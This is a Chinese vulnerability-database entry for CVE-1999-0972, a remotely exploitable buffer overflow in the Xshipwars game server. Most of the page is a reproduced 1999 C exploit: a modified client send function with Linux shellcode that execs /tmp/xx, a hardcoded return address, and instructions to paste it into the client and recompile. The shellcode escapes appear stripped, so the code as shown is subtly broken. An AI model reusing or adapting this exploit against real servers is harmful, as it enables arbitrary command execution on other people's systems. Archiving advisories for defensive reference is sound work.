Xshipwars缓冲区溢出漏洞
漏洞ID | 1105640 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-12-09 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0972 |
CNNVD-ID | CNNVD-199912-041 |
漏洞平台 | Multiple | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Xshipwars的xsw程序存在缓冲区溢出漏洞。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/863/info
Xshipwars a graphical 'star battle' client/server based game which runs a variety of platforms. Certain versions of the server which facilitates this game (versions before 1.25) had a remotely exploitable buffer overflow. The exploit would result in the execution of arbitrary commands as the UID of the server process.
*/
/* If the offset is off for your box, then the server will still crash,
and will begin an endless loop of sending itself log messages,
filling up whatever space it can on whatever partition it's installed
on. This is less than optimal behavior, so quickly find and kill the
server if your exploit fails.
Love,
A. Woodward, Dec 1999
<cut this and paste it into your client's source file, modify your
.h's to raise the limit on a few variables (grep for 256 and turn them
into 2560), recompile, and enjoy> */
/*
* Sends a literal command.
*/
/*hacked to send our attack buffer!*/
int
NetSendExec(char *arg)
{
char larg[CS_MESG_MAX];
char sndbuf[CS_DATA_MAX_LEN];
char exploitbuf[CS_DATA_MAX_LEN];
int i;
/*test shellcode. No whitespace, just exec's /tmp/xx. If it's not
there, does random things. Replace this for slightly more
fun. ;> */
char code[] ="xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c"
"xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb"
"x89xd8x40xcdx80xe8xdcxffxffxff/tmp/xx";
#define SIZEOFBUF 229
memset(exploitbuf,0x41,SIZEOFBUF);
#define SHELLSTART 50
memcpy(exploitbuf+SHELLSTART,code,strlen(code));
/*Return to: 0xbfffebe4 Your Kilometerage May Vary*/
exploitbuf[132]=0xe4;
exploitbuf[133]=0xeb;
exploitbuf[134]=0xff;
exploitbuf[135]=0xbf;
exploitbuf[SIZEOFBUF-1]=0;
/*
if(arg == NULL)
return(-1);
if(arg[0] == ' ')
return(-2);
*/
/*strncpy(larg, arg, CS_MESG_MAX);*/
strncpy(larg, exploitbuf, CS_MESG_MAX);
larg[CS_MESG_MAX - 1] = ' ';
/*
* NET_CMD_EXEC format is as follows:
*
* argument
*/
sprintf(sndbuf, "%i %sn",
CS_CODE_LITERALCMD,
larg
);
NetSendData(sndbuf);
return(0);
}
|参考资料
来源:BID
名称:863
链接:http://www.securityfocus.com/bid/863
相关推荐: HP TruCluster Server Cluster Alias/NFS Denial of Service Vulnerability
HP TruCluster Server Cluster Alias/NFS Denial of Service Vulnerability 漏洞ID 1100451 漏洞类型 Unknown 发布时间 2003-04-22 更新时间 2003-04-22 C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666